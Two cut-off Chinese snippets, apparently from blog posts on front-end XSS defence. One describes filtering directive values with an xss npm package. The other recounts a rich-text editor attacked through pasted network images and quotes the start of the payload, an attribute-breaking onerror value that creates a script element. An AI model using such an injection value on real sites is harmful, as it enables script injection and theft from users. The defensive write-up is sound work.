通常我们处理xss攻击会使用一个xss的npm包来过滤xss攻击代码。所以我们要做的就是给指令的value包上一层xss函数。有同学可能会问，我们在业务代码里使用xss函数处理也行。是的可以，但是我们不能保证团队每一个成员都会使用xss函数处理。作为前端的架构师，我们需要从项目…

一切的原因都归咎于富文本编辑器.... 应需求将文本域修改成富文本编辑器支持用户直接粘贴图片遭到用户使用网络图片上传方式攻击 攻击代码1" onerror=s=createElement('scrip